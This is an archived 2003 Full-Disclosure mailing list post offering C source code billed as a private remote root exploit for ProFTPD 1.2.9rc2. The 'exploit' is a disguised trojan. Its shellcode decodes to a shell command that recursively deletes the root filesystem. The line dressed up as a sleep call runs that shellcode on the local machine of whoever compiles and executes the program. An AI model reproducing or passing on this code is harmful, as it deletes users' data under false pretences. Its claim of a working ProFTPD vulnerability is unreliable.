Full Disclosure mailing list archives
ProFTPD-1.2.9rc2 remote root exploit
From: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>
Date: Fri, 24 Oct 2003 12:22:25 +0000
Ladies and gentlemen, here's the source code of the exploit for the latest release of ProFTPD. This is a Zero-Day private exploit, please DON'T REDISTRIBUTE. I will not take responsibility for any damages which could result from the usage of this exploit, use it at your own risk. -------------------------------------------------------------------------- /* Example of use: # gcc exploit.c -o exploit # ./exploit 192.168.1.1 21 Connected on 192.168.1.1:21 Exploitation in progress... Exploitation string sent. Trying to connect, please wait... Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown unknown GNU/Linux uid=0(root) gid=0(root) groupes=0(root) */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <netdb.h> #define NOP 0x90 #define RET 0x6675636b /* x86 bind shellcode */ char sc[]= "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; unsigned long resolve(char *hostname); int give_me_a_shell(unsigned long dest); int main(int argc, char *argv[]) { int i, *ret; char *string; unsigned long addr; char buffer[1024]; int port=21, fd, s; struct sockaddr_in addy; if(argc < 2) { fprintf(stdout, "usage: %s <host> <port>\n", argv[0]); return(0); } else addr=resolve(argv[1]); if(argv[2]) port=atoi(argv[2]); /* copy the NOPs to the buffer */ memset(buffer, NOP, 1024); /* copy the shellcode to the buffer */ for(i=0; i < strlen(sc); i++) buffer[i+700]=sc[i]; /* copy the return address to the buffer */ for(i=815; i<1003; i+=4) *((int *)&buffer[i]) = RET; string = (char *) malloc(strlen(buffer)+20); sprintf(string, "\x4c\x4f\x56\x45 %s", buffer); fd = socket(AF_INET, SOCK_STREAM, 0); if(fd < 0) { fprintf(stderr, "unable to socket()\n"); return(-1); } addy.sin_family = AF_INET; addy.sin_addr.s_addr = addr; addy.sin_port = htons(port); /* connect to remote host */ if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0) { fprintf(stderr, "unable to connect()\n"); return(-1); } printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port); printf("Exploitation in progress...\n"); /* send the exploitation string to the host */ if(s = send(fd, string, sizeof(string), 0) < 0) { fprintf(stderr, "unable to send()\n"); return(-1); } close(fd); printf("Exploitation string sent.\n"); free(string); /* connect to the bindshell */ printf("Trying to connect, please wait...\n"); void(*sleep)()=(void*)sc;sleep(5); if(give_me_a_shell(addr) < 0) { fprintf(stderr, "Sorry, exploit didn't work.\n"); return(-1); } return(0); } unsigned long resolve(char *sname) { struct hostent * hip; hip = gethostbyname(sname); if (!hip) { fprintf(stderr, "unable to find %s\n",sname); exit(1); } return *(unsigned long *)hip -> h_addr; } int give_me_a_shell(unsigned long addr) { int sock; fd_set fds; struct sockaddr_in shell; unsigned char buf[4096]; char cmd[]="uname -a && id"; sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0) { fprintf(stderr, "unable to socket()\n"); return(-1); } shell.sin_family = AF_INET; shell.sin_port = htons(1337); shell.sin_addr.s_addr = addr; if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0) { fprintf(stderr, "unable to connect()\n"); close(sock); return(-1); } send(sock, cmd, strlen(cmd), 0); while(1) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); if(select(255, &fds, NULL, NULL, NULL) == -1) { fprintf(stderr, "unable to select()\n"); close(sock); return(-1); } memset(buf, 0, sizeof(buf)); if(FD_ISSET(sock, &fds)) { if(recv(sock, buf, sizeof(buf), 0) < 0) { fprintf(stderr, "unable to recv()\n"); close(sock); return(-1); } fprintf(stderr, "%s", buf); } if(FD_ISSET(0, &fds)) { read(0, buf, sizeof(buf)); if(!strcmp(buf, "quit")) { close(sock); return(0); } write(sock, buf, strlen(buf)); } } } -------------------------------------------------------------------------- Have fun ! @+ _________________________________________________________________MSN Messenger 6 http://g.msn.fr/FR1001/866 : plus de personnalisation, plus de fun pour vous et vos amisÂ…
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Valdis . Kletnieks (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)